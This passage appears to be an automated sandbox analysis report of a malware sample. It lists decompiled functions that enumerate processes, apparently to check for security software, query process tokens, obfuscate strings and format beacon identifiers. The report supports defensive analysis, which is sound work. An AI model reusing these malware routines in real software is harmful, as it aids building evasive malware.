                                					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
                                				}
                                				if(_v8 >= _t39) {
                                					_t28 = _v12;
                                					if(_t28 != 0) {
                                						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
                                						_v8 = _t31;
                                						if(_t31 >= 0) {
                                							_t46 = lstrlenW(_v16);
                                							if(_t46 != 0) {
                                								_t46 = _t46 + 1;
                                								_t48 = _t46 + _t46;
                                								_t39 = E04A41525(_t48);
                                								if(_t39 == 0) {
                                									_v8 = 0x8007000e;
                                								} else {
                                									memcpy(_t39, _v16, _t48);
                                								}
                                								__imp__#6(_v16);
                                							}
                                						}
                                						_t32 = _v12;
                                						 *((intOrPtr*)( *_t32 + 8))(_t32);
                                					}
                                					 *_a4 = _t39;
                                					 *_a8 = _t46 + _t46;
                                				}
                                				goto L13;
                                			}

                                Instruction addresses (address column of the listing above, in listing order): 0x04a45f64 0x04a45f68 0x04a45f69 0x04a45f6a 0x04a45f6c 0x04a45f6e 0x04a45f71 0x04a45f76 0x04a4600d 0x04a46014 0x04a46014 0x04a45f7f 0x04a45f86 0x04a45f96 0x04a45f96 0x04a45f9c 0x04a45f9e 0x04a45fa3 0x04a45fac 0x04a45fb2 0x04a45fb7 0x04a45fc2 0x04a45fc6 0x04a45fc8 0x04a45fc9 0x04a45fd2 0x04a45fd6 0x04a45fe7 0x04a45fd8 0x04a45fdd 0x04a45fe2 0x04a45ff1 0x04a45ff1 0x04a45fc6 0x04a45ff7 0x04a45ffd 0x04a45ffd 0x04a46006 0x04a4600b 0x04a4600b 0x00000000

                                APIs
                                Memory Dump Source
                                • Source File: 00000004.00000002.798189537.0000000004A41000.00000020.00020000.sdmp, Offset: 04A40000, based on PE: true
                                • Associated: 00000004.00000002.798169194.0000000004A40000.00000004.00020000.sdmp
                                • Associated: 00000004.00000002.798218094.0000000004A4C000.00000002.00020000.sdmp
                                • Associated: 00000004.00000002.798230640.0000000004A4D000.00000004.00020000.sdmp
                                • Associated: 00000004.00000002.798247965.0000000004A4F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                Similarity
                                • API ID: FreeSleepStringlstrlenmemcpy
                                • String ID:
                                • API String ID: 1198164300-0
                                • Opcode ID: 8409a00a587c9ac864aa788ffa49eff47e662bec881d67c017e51111bfb4d55d
                                • Instruction ID: 32d2957ce4bf620819336e0e5a7ac5cc954dc48a34b08d5d5bfdd3c458909c2e
                                • Opcode Fuzzy Hash: 8409a00a587c9ac864aa788ffa49eff47e662bec881d67c017e51111bfb4d55d
                                • Instruction Fuzzy Hash: 35217175901209FFDB11DFA8D98499EBBB5FFC9310B108169E906D7240EB35EA01CF61
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 68%
                                			E04A4A41C(unsigned int __eax, void* __ecx) {
                                				void* _v8;
                                				void* _v12;
                                				signed int _t21;
                                				signed short _t23;
                                				char* _t27;
                                				void* _t29;
                                				void* _t30;
                                				unsigned int _t33;
                                				void* _t37;
                                				unsigned int _t38;
                                				void* _t41;
                                				void* _t42;
                                				int _t45;
                                				void* _t46;
                                
                                				_t42 = __eax;
                                				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
                                				_t38 = __eax;
                                				_t30 = RtlAllocateHeap( *0x4a4d238, 0, (__eax >> 3) + __eax + 1);
                                				_v12 = _t30;
                                				if(_t30 != 0) {
                                					_v8 = _t42;
                                					do {
                                						_t33 = 0x18;
                                						if(_t38 <= _t33) {
                                							_t33 = _t38;
                                						}
                                						_t21 =  *0x4a4d250; // 0x82126d82
                                						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
                                						 *0x4a4d250 = _t23;
                                						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
                                						memcpy(_t30, _v8, _t45);
                                						_v8 = _v8 + _t45;
                                						_t27 = _t30 + _t45;
                                						_t38 = _t38 - _t45;
                                						_t46 = _t46 + 0xc;
                                						 *_t27 = 0x2f;
                                						_t13 = _t27 + 1; // 0x1
                                						_t30 = _t13;
                                					} while (_t38 > 8);
                                					memcpy(_t30, _v8, _t38 + 1);
                                				}
                                				return _v12;
                                			}

                                Instruction addresses (address column of the listing above, in listing order): 0x04a4a424 0x04a4a427 0x04a4a42d 0x04a4a445 0x04a4a447 0x04a4a44c 0x04a4a44e 0x04a4a451 0x04a4a453 0x04a4a456 0x04a4a458 0x04a4a458 0x04a4a45a 0x04a4a465 0x04a4a46a 0x04a4a47b 0x04a4a483 0x04a4a488 0x04a4a48b 0x04a4a48e 0x04a4a490 0x04a4a493 0x04a4a496 0x04a4a496 0x04a4a499 0x04a4a4a4 0x04a4a4a9 0x04a4a4b3

                                APIs
                                • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,04A47C20,00000000,?,?,04A49DA0,?,04E595B0), ref: 04A4A427
                                • RtlAllocateHeap.NTDLL(00000000,?), ref: 04A4A43F
                                • memcpy.NTDLL(00000000,?,-00000008,?,?,?,04A47C20,00000000,?,?,04A49DA0,?,04E595B0), ref: 04A4A483
                                • memcpy.NTDLL(00000001,?,00000001), ref: 04A4A4A4
                                Memory Dump Source
                                • Source File: 00000004.00000002.798189537.0000000004A41000.00000020.00020000.sdmp, Offset: 04A40000, based on PE: true
                                • Associated: 00000004.00000002.798169194.0000000004A40000.00000004.00020000.sdmp
                                • Associated: 00000004.00000002.798218094.0000000004A4C000.00000002.00020000.sdmp
                                • Associated: 00000004.00000002.798230640.0000000004A4D000.00000004.00020000.sdmp
                                • Associated: 00000004.00000002.798247965.0000000004A4F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                Similarity
                                • API ID: memcpy$AllocateHeaplstrlen
                                • String ID:
                                • API String ID: 1819133394-0
                                • Opcode ID: 6c20ad4f4e325420e43bf0657d5c7a9fa742e6915566706be13fcf84002250b2
                                • Instruction ID: d3f76eab1de519d190bb169c7c6c33e6f939d2bace066cf9e7b8e29e9fbdd562
                                • Opcode Fuzzy Hash: 6c20ad4f4e325420e43bf0657d5c7a9fa742e6915566706be13fcf84002250b2
                                • Instruction Fuzzy Hash: E1112976A00114BFD3108FA9DC88D9EBBAEDBD4361B150276F505DB180E7759E01C760
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 68%
                                			E04A48F1B() {
                                				char _v264;
                                				void* _v300;
                                				int _t8;
                                				intOrPtr _t9;
                                				int _t15;
                                				void* _t17;
                                
                                				_t15 = 0;
                                				_t17 = CreateToolhelp32Snapshot(2, 0);
                                				if(_t17 != 0) {
                                					_t8 = Process32First(_t17,  &_v300);
                                					while(_t8 != 0) {
                                						_t9 =  *0x4a4d2a8; // 0x40a5a8
                                						_t2 = _t9 + 0x4a4ee34; // 0x73617661
                                						_push( &_v264);
                                						if( *0x4a4d0fc() != 0) {
                                							_t15 = 1;
                                						} else {
                                							_t8 = Process32Next(_t17,  &_v300);
                                							continue;
                                						}
                                						L7:
                                						CloseHandle(_t17);
                                						goto L8;
                                					}
                                					goto L7;
                                				}
                                				L8:
                                				return _t15;
                                			}

                                Instruction addresses (address column of the listing above, in listing order): 0x04a48f26 0x04a48f30 0x04a48f34 0x04a48f3e 0x04a48f6f 0x04a48f45 0x04a48f4a 0x04a48f57 0x04a48f60 0x04a48f77 0x04a48f62 0x04a48f6a 0x00000000 0x04a48f6a 0x04a48f78 0x04a48f79 0x00000000 0x04a48f79 0x00000000 0x04a48f73 0x04a48f7f 0x04a48f84

                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 04A48F2B
                                • Process32First.KERNEL32(00000000,?), ref: 04A48F3E
                                • Process32Next.KERNEL32(00000000,?), ref: 04A48F6A
                                • CloseHandle.KERNEL32(00000000), ref: 04A48F79
                                Memory Dump Source
                                • Source File: 00000004.00000002.798189537.0000000004A41000.00000020.00020000.sdmp, Offset: 04A40000, based on PE: true
                                • Associated: 00000004.00000002.798169194.0000000004A40000.00000004.00020000.sdmp
                                • Associated: 00000004.00000002.798218094.0000000004A4C000.00000002.00020000.sdmp
                                • Associated: 00000004.00000002.798230640.0000000004A4D000.00000004.00020000.sdmp
                                • Associated: 00000004.00000002.798247965.0000000004A4F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                Similarity
                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                • String ID:
                                • API String ID: 420147892-0
                                • Opcode ID: 7ca779acfa7dfd3ff2f490f62bde7fad186e5b6072485981e3fad68196bff1a2
                                • Instruction ID: 6d3153e0046fe2e57aa5b5f8fc65b5735ac69c9abf730457b8a7f701215a3699
                                • Opcode Fuzzy Hash: 7ca779acfa7dfd3ff2f490f62bde7fad186e5b6072485981e3fad68196bff1a2
                                • Instruction Fuzzy Hash: 76F0B43A2011286BF720BB66AC49DEFB6ADDBD5714F000169E909D3040FA29FA4686B1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E04A48C01(void* __esi) {
                                				struct _SECURITY_ATTRIBUTES* _v4;
                                				void* _t8;
                                				void* _t10;
                                
                                				_v4 = 0;
                                				memset(__esi, 0, 0x38);
                                				_t8 = CreateEventA(0, 1, 0, 0);
                                				 *(__esi + 0x1c) = _t8;
                                				if(_t8 != 0) {
                                					_t10 = CreateEventA(0, 1, 1, 0);
                                					 *(__esi + 0x20) = _t10;
                                					if(_t10 == 0) {
                                						CloseHandle( *(__esi + 0x1c));
                                					} else {
                                						_v4 = 1;
                                					}
                                				}
                                				return _v4;
                                			}

                                Instruction addresses (address column of the listing above, in listing order): 0x04a48c0b 0x04a48c0f 0x04a48c24 0x04a48c26 0x04a48c2b 0x04a48c31 0x04a48c33 0x04a48c38 0x04a48c43 0x04a48c3a 0x04a48c3a 0x04a48c3a 0x04a48c38 0x04a48c51

                                APIs
                                • memset.NTDLL ref: 04A48C0F
                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,74E481D0), ref: 04A48C24
                                • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000), ref: 04A48C31
                                • CloseHandle.KERNEL32(?), ref: 04A48C43
                                Memory Dump Source
                                • Source File: 00000004.00000002.798189537.0000000004A41000.00000020.00020000.sdmp, Offset: 04A40000, based on PE: true
                                • Associated: 00000004.00000002.798169194.0000000004A40000.00000004.00020000.sdmp
                                • Associated: 00000004.00000002.798218094.0000000004A4C000.00000002.00020000.sdmp
                                • Associated: 00000004.00000002.798230640.0000000004A4D000.00000004.00020000.sdmp
                                • Associated: 00000004.00000002.798247965.0000000004A4F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                Similarity
                                • API ID: CreateEvent$CloseHandlememset
                                • String ID:
                                • API String ID: 2812548120-0
                                • Opcode ID: 94b11bf17f477450968a0bcec4edf624190ad61edfdd96c77407c9cb834143ae
                                • Instruction ID: 1c1adb47c2c9de8f5f89f511e2096fd7fbf96aa3aefd49d6aff3b7f3d2609d20
                                • Opcode Fuzzy Hash: 94b11bf17f477450968a0bcec4edf624190ad61edfdd96c77407c9cb834143ae
                                • Instruction Fuzzy Hash: 68F089B910530CBFD3206F25DCC4C2FBBACEBD5599721492DF14681111D67ABC4D8A70
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E04A44DB1() {
                                				void* _t1;
                                				intOrPtr _t5;
                                				void* _t6;
                                				void* _t7;
                                				void* _t11;
                                
                                				_t1 =  *0x4a4d26c; // 0x2cc
                                				if(_t1 == 0) {
                                					L8:
                                					return 0;
                                				}
                                				SetEvent(_t1);
                                				_t11 = 0x7fffffff;
                                				while(1) {
                                					SleepEx(0x64, 1);
                                					_t5 =  *0x4a4d2bc; // 0x0
                                					if(_t5 == 0) {
                                						break;
                                					}
                                					_t11 = _t11 - 0x64;
                                					if(_t11 > 0) {
                                						continue;
                                					}
                                					break;
                                				}
                                				_t6 =  *0x4a4d26c; // 0x2cc
                                				if(_t6 != 0) {
                                					CloseHandle(_t6);
                                				}
                                				_t7 =  *0x4a4d238; // 0x4a60000
                                				if(_t7 != 0) {
                                					HeapDestroy(_t7);
                                				}
                                				goto L8;
                                			}

                                Instruction addresses (address column of the listing above, in listing order): 0x04a44db1 0x04a44db8 0x04a44e02 0x04a44e04 0x04a44e04 0x04a44dbc 0x04a44dc2 0x04a44dc7 0x04a44dcb 0x04a44dd1 0x04a44dd8 0x00000000 0x00000000 0x04a44dda 0x04a44ddf 0x00000000 0x00000000 0x00000000 0x04a44ddf 0x04a44de1 0x04a44de9 0x04a44dec 0x04a44dec 0x04a44df2 0x04a44df9 0x04a44dfc 0x04a44dfc 0x00000000

                                APIs
                                • SetEvent.KERNEL32(000002CC,00000001,04A47F41), ref: 04A44DBC
                                • SleepEx.KERNEL32(00000064,00000001), ref: 04A44DCB
                                • CloseHandle.KERNEL32(000002CC), ref: 04A44DEC
                                • HeapDestroy.KERNEL32(04A60000), ref: 04A44DFC
                                Memory Dump Source
                                • Source File: 00000004.00000002.798189537.0000000004A41000.00000020.00020000.sdmp, Offset: 04A40000, based on PE: true
                                • Associated: 00000004.00000002.798169194.0000000004A40000.00000004.00020000.sdmp
                                • Associated: 00000004.00000002.798218094.0000000004A4C000.00000002.00020000.sdmp
                                • Associated: 00000004.00000002.798230640.0000000004A4D000.00000004.00020000.sdmp
                                • Associated: 00000004.00000002.798247965.0000000004A4F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                Similarity
                                • API ID: CloseDestroyEventHandleHeapSleep
                                • String ID:
                                • API String ID: 4109453060-0
                                • Opcode ID: 308dae81138355eb0f8de7199f07653e39db7a89d4c0e5cec0ff19b193aa6a2c
                                • Instruction ID: 8fc0b11bd032479795ea6d5b026d859756308926539de08d7cfe5eb0869ce1e1
                                • Opcode Fuzzy Hash: 308dae81138355eb0f8de7199f07653e39db7a89d4c0e5cec0ff19b193aa6a2c
                                • Instruction Fuzzy Hash: C8F0A039B02311ABFB205B359908F4E3B98EBE8771B054210F914DB680CF2AEC02C660
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 58%
                                			E04A48CFA(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
                                				intOrPtr* _v8;
                                				void* _t17;
                                				intOrPtr* _t22;
                                				void* _t27;
                                				char* _t30;
                                				void* _t33;
                                				void* _t34;
                                				void* _t36;
                                				void* _t37;
                                				void* _t39;
                                				int _t42;
                                
                                				_t17 = __eax;
                                				_t37 = 0;
                                				__imp__(_a4, _t33, _t36, _t27, __ecx);
                                				_t2 = _t17 + 1; // 0x1
                                				_t28 = _t2;
                                				_t34 = E04A41525(_t2);
                                				if(_t34 != 0) {
                                					_t30 = E04A41525(_t28);
                                					if(_t30 == 0) {
                                						E04A48B22(_t34);
                                					} else {
                                						_t39 = _a4;
                                						_t22 = E04A4A7C2(_t39);
                                						_v8 = _t22;
                                						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
                                							_a4 = _t39;
                                						} else {
                                							_t26 = _t22 + 2;
                                							_a4 = _t22 + 2;
                                							_t22 = E04A4A7C2(_t26);
                                							_v8 = _t22;
                                						}
                                						if(_t22 == 0) {
                                							__imp__(_t34, _a4);
                                							 *_t30 = 0x2f;
                                							 *((char*)(_t30 + 1)) = 0;
                                						} else {
                                							_t42 = _t22 - _a4;
                                							memcpy(_t34, _a4, _t42);
                                							 *((char*)(_t34 + _t42)) = 0;
                                							__imp__(_t30, _v8);
                                						}
                                						 *_a8 = _t34;
                                						_t37 = 1;
                                						 *_a12 = _t30;
                                					}
                                				}
                                				return _t37;
                                			}

                                Instruction addresses (address column of the listing above, in listing order): 0x04a48cfa 0x04a48d04 0x04a48d06 0x04a48d0c 0x04a48d0c 0x04a48d15 0x04a48d19 0x04a48d25 0x04a48d29 0x04a48d9d 0x04a48d2b 0x04a48d2b 0x04a48d2f 0x04a48d34 0x04a48d39 0x04a48d53 0x04a48d42 0x04a48d42 0x04a48d46 0x04a48d49 0x04a48d4e 0x04a48d4e 0x04a48d58 0x04a48d80 0x04a48d86 0x04a48d89 0x04a48d5a 0x04a48d5c 0x04a48d64 0x04a48d6f 0x04a48d74 0x04a48d74 0x04a48d90 0x04a48d97 0x04a48d98 0x04a48d98 0x04a48d29 0x04a48da8

                                APIs
                                • lstrlen.KERNEL32(00000000,00000008,?,74E04D40,?,?,04A49816,?,?,?,?,00000102,04A4937B,?,?,00000000), ref: 04A48D06
                                  • Part of subcall function 04A41525: RtlAllocateHeap.NTDLL(00000000,00000000,04A41278), ref: 04A41531
                                  • Part of subcall function 04A4A7C2: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,04A48D34,00000000,00000001,00000001,?,?,04A49816,?,?,?,?,00000102), ref: 04A4A7D0
                                  • Part of subcall function 04A4A7C2: StrChrA.SHLWAPI(?,0000003F,?,?,04A49816,?,?,?,?,00000102,04A4937B,?,?,00000000,00000000), ref: 04A4A7DA
                                • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,04A49816,?,?,?,?,00000102,04A4937B,?), ref: 04A48D64
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 04A48D74
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 04A48D80
                                Memory Dump Source
                                • Source File: 00000004.00000002.798189537.0000000004A41000.00000020.00020000.sdmp, Offset: 04A40000, based on PE: true
                                • Associated: 00000004.00000002.798169194.0000000004A40000.00000004.00020000.sdmp
                                • Associated: 00000004.00000002.798218094.0000000004A4C000.00000002.00020000.sdmp
                                • Associated: 00000004.00000002.798230640.0000000004A4D000.00000004.00020000.sdmp
                                • Associated: 00000004.00000002.798247965.0000000004A4F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                Similarity
                                • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                                • String ID:
                                • API String ID: 3767559652-0
                                • Opcode ID: a21c49e2c2d982612b47fc667f9d16a589902de1004598811785412b702cfbbe
                                • Instruction ID: 531b09048460d97660c68a674f33e56ba851bdf8614f10fdc30d17fa7796e5dc
                                • Opcode Fuzzy Hash: a21c49e2c2d982612b47fc667f9d16a589902de1004598811785412b702cfbbe
                                • Instruction Fuzzy Hash: 7C21067A601215FFDB126F78EC44AAE7FB8EFD6294B058059F9059F210D739ED0187A0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E04A4272D(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                                				void* _v8;
                                				void* _t18;
                                				int _t25;
                                				int _t29;
                                				int _t34;
                                
                                				_t29 = lstrlenW(_a4);
                                				_t25 = lstrlenW(_a8);
                                				_t18 = E04A41525(_t25 + _t29 + _t25 + _t29 + 2);
                                				_v8 = _t18;
                                				if(_t18 != 0) {
                                					_t34 = _t29 + _t29;
                                					memcpy(_t18, _a4, _t34);
                                					_t10 = _t25 + 2; // 0x2
                                					memcpy(_v8 + _t34, _a8, _t25 + _t10);
                                				}
                                				return _v8;
                                			}

                                0x04a42742
                                0x04a42746
                                0x04a42750
                                0x04a42755
                                0x04a4275a
                                0x04a4275c
                                0x04a42764
                                0x04a42769
                                0x04a42777
                                0x04a4277c
                                0x04a42786

                                APIs
                                • lstrlenW.KERNEL32(004F0053,?,74E05520,00000008,04E5935C,?,04A45398,004F0053,04E5935C,?,?,?,?,?,?,04A47CCB), ref: 04A4273D
                                • lstrlenW.KERNEL32(04A45398,?,04A45398,004F0053,04E5935C,?,?,?,?,?,?,04A47CCB), ref: 04A42744
                                  • Part of subcall function 04A41525: RtlAllocateHeap.NTDLL(00000000,00000000,04A41278), ref: 04A41531
                                • memcpy.NTDLL(00000000,004F0053,74E069A0,?,?,04A45398,004F0053,04E5935C,?,?,?,?,?,?,04A47CCB), ref: 04A42764
                                • memcpy.NTDLL(74E069A0,04A45398,00000002,00000000,004F0053,74E069A0,?,?,04A45398,004F0053,04E5935C), ref: 04A42777
                                Memory Dump Source
                                • Source File: 00000004.00000002.798189537.0000000004A41000.00000020.00020000.sdmp, Offset: 04A40000, based on PE: true
                                • Associated: 00000004.00000002.798169194.0000000004A40000.00000004.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798218094.0000000004A4C000.00000002.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798230640.0000000004A4D000.00000004.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798247965.0000000004A4F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                Similarity
                                • API ID: lstrlenmemcpy$AllocateHeap
                                • String ID:
                                • API String ID: 2411391700-0
                                • Opcode ID: d233af206818cc2991e719a5a32f0adcb2f05158b3bf19077187ba1ac1fe812a
                                • Instruction ID: 77b1b205a678eb5ffdc4c0ededa4983588c6d621d119afa68111d5cd033e5ba7
                                • Opcode Fuzzy Hash: d233af206818cc2991e719a5a32f0adcb2f05158b3bf19077187ba1ac1fe812a
                                • Instruction Fuzzy Hash: 27F04F76900118BB9F11DFA9CC44CDF7BADEF892947114062FD04D7101E635EA108BA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • lstrlen.KERNEL32(04E59B08,00000000,00000000,7691C740,04A49DCB,00000000), ref: 04A4A687
                                • lstrlen.KERNEL32(?), ref: 04A4A68F
                                  • Part of subcall function 04A41525: RtlAllocateHeap.NTDLL(00000000,00000000,04A41278), ref: 04A41531
                                • lstrcpy.KERNEL32(00000000,04E59B08), ref: 04A4A6A3
                                • lstrcat.KERNEL32(00000000,?), ref: 04A4A6AE
                                Memory Dump Source
                                • Source File: 00000004.00000002.798189537.0000000004A41000.00000020.00020000.sdmp, Offset: 04A40000, based on PE: true
                                • Associated: 00000004.00000002.798169194.0000000004A40000.00000004.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798218094.0000000004A4C000.00000002.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798230640.0000000004A4D000.00000004.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798247965.0000000004A4F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                Similarity
                                • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                                • String ID:
                                • API String ID: 74227042-0
                                • Opcode ID: 8f2b967c5177cd4a5c72b76545b1196ee685f9e9b4adb77ec8e0abb5444fb20a
                                • Instruction ID: f29c384be251f848e33dd3d813643d64b6a6397c98dbe48ff9959be62a1e8327
                                • Opcode Fuzzy Hash: 8f2b967c5177cd4a5c72b76545b1196ee685f9e9b4adb77ec8e0abb5444fb20a
                                • Instruction Fuzzy Hash: 8EE092375026316797119BE4AC4CC9FBBACEFE96663050416FA04D3110C72ADC028BA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Executed Functions

                                Control-flow Graph

                                C-Code - Quality: 38%
                                			E04289A0F(char _a4, void* _a8) {
                                				void* _v8;
                                				void* _v12;
                                				char _v16;
                                				void* _v20;
                                				char _v24;
                                				char _v28;
                                				char _v32;
                                				char _v36;
                                				char _v40;
                                				void* _v44;
                                				void** _t33;
                                				void* _t40;
                                				void* _t43;
                                				void** _t44;
                                				intOrPtr* _t47;
                                				char _t48;
                                
                                				asm("stosd");
                                				asm("stosd");
                                				asm("stosd");
                                				asm("stosd");
                                				asm("stosd");
                                				_v20 = _a4;
                                				_t48 = 0;
                                				_v16 = 0;
                                				_a4 = 0;
                                				_v44 = 0x18;
                                				_v40 = 0;
                                				_v32 = 0;
                                				_v36 = 0;
                                				_v28 = 0;
                                				_v24 = 0;
                                				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
                                					_t33 =  &_v8;
                                					__imp__(_v12, 8, _t33);
                                					if(_t33 >= 0) {
                                						_t47 = __imp__;
                                						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
                                						_t44 = E04281525(_a4);
                                						if(_t44 != 0) {
                                							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
                                							if(_t40 >= 0) {
                                								memcpy(_a8,  *_t44, 0x1c);
                                								_t48 = 1;
                                							}
                                							E04288B22(_t44);
                                						}
                                						NtClose(_v8); // executed
                                					}
                                					NtClose(_v12);
                                				}
                                				return _t48;
                                			}

                                0x04289a1c
                                0x04289a1d
                                0x04289a1e
                                0x04289a1f
                                0x04289a20
                                0x04289a24
                                0x04289a2b
                                0x04289a3a
                                0x04289a3d
                                0x04289a40
                                0x04289a47
                                0x04289a4a
                                0x04289a4d
                                0x04289a50
                                0x04289a53
                                0x04289a5e
                                0x04289a60
                                0x04289a69
                                0x04289a71
                                0x04289a73
                                0x04289a85
                                0x04289a8f
                                0x04289a93
                                0x04289aa2
                                0x04289aa6
                                0x04289aaf
                                0x04289ab7
                                0x04289ab7
                                0x04289ab9
                                0x04289ab9
                                0x04289ac1
                                0x04289ac7
                                0x04289acb
                                0x04289acb
                                0x04289ad6

                                APIs
                                • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 04289A56
                                • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 04289A69
                                • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 04289A85
                                  • Part of subcall function 04281525: RtlAllocateHeap.NTDLL(00000000,00000000,04281278), ref: 04281531
                                • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 04289AA2
                                • memcpy.NTDLL(00000000,00000000,0000001C), ref: 04289AAF
                                • NtClose.NTDLL(?), ref: 04289AC1
                                • NtClose.NTDLL(00000000), ref: 04289ACB
                                Memory Dump Source
                                • Source File: 00000005.00000002.797793589.0000000004281000.00000020.00020000.sdmp, Offset: 04280000, based on PE: true
                                • Associated: 00000005.00000002.797775742.0000000004280000.00000004.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797838097.000000000428C000.00000002.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797848047.000000000428D000.00000004.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797862706.000000000428F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_4280000_rundll32.jbxd
                                Similarity
                                • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                                • String ID:
                                • API String ID: 2575439697-0
                                • Opcode ID: 2af0910d5207f32fab2d9f3689348078f9b8247bb1e36d835eb8674bc7d23abb
                                • Instruction ID: fb4026a20081c413aa2ffe758d0417e40dfbabb8098c4ec9dac1d375099c5371
                                • Opcode Fuzzy Hash: 2af0910d5207f32fab2d9f3689348078f9b8247bb1e36d835eb8674bc7d23abb
                                • Instruction Fuzzy Hash: B5212AB2A51118BBDB01AF99DC44EEEBFBDEF48740F10801AF901E6150D7759A449BA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                C-Code - Quality: 66%
                                			E04289BF1(long __eax, void* __ecx, void* __edx, intOrPtr _a4, void* _a16, void* _a24, intOrPtr _a32) {
                                				intOrPtr _v0;
                                				intOrPtr _v4;
                                				intOrPtr _v16;
                                				intOrPtr _v24;
                                				intOrPtr _v28;
                                				void* _v44;
                                				intOrPtr _v52;
                                				void* __edi;
                                				long _t25;
                                				intOrPtr _t26;
                                				intOrPtr _t27;
                                				intOrPtr _t28;
                                				intOrPtr _t29;
                                				intOrPtr _t30;
                                				void* _t33;
                                				intOrPtr _t34;
                                				int _t37;
                                				void* _t38;
                                				intOrPtr _t42;
                                				intOrPtr _t43;
                                				intOrPtr _t50;
                                				intOrPtr _t54;
                                				intOrPtr* _t56;
                                				intOrPtr _t62;
                                				intOrPtr _t68;
                                				intOrPtr _t71;
                                				intOrPtr _t74;
                                				int _t77;
                                				intOrPtr _t78;
                                				int _t81;
                                				intOrPtr _t83;
                                				int _t86;
                                				intOrPtr* _t89;
                                				intOrPtr* _t90;
                                				void* _t91;
                                				void* _t95;
                                				void* _t96;
                                				void* _t97;
                                				intOrPtr _t98;
                                				void* _t100;
                                				int _t101;
                                				void* _t102;
                                				void* _t103;
                                				void* _t105;
                                				void* _t106;
                                				void* _t108;
                                
                                				_t95 = __edx;
                                				_t91 = __ecx;
                                				_t25 = __eax;
                                				_t105 = _a16;
                                				_v4 = 8;
                                				if(__eax == 0) {
                                					_t25 = GetTickCount();
                                				}
                                				_t26 =  *0x428d018; // 0xefcf766a
                                				asm("bswap eax");
                                				_t27 =  *0x428d014; // 0x3a87c8cd
                                				asm("bswap eax");
                                				_t28 =  *0x428d010; // 0xd8d2f808
                                				asm("bswap eax");
                                				_t29 = E0428D00C; // 0xeec43f25
                                				asm("bswap eax");
                                				_t30 =  *0x428d2a8; // 0xaea5a8
                                				_t3 = _t30 + 0x428e633; // 0x74666f73
                                				_t101 = wsprintfA(_t105, _t3, 2, 0x3d163, _t29, _t28, _t27, _t26,  *0x428d02c,  *0x428d004, _t25);
                                				_t33 = E04283288();
                                				_t34 =  *0x428d2a8; // 0xaea5a8
                                				_t4 = _t34 + 0x428e673; // 0x74707526
                                				_t37 = wsprintfA(_t101 + _t105, _t4, _t33);
                                				_t108 = _t106 + 0x38;
                                				_t102 = _t101 + _t37; // executed
                                				_t38 = E0428831C(_t91); // executed
                                				_t96 = _t38;
                                				if(_t96 != 0) {
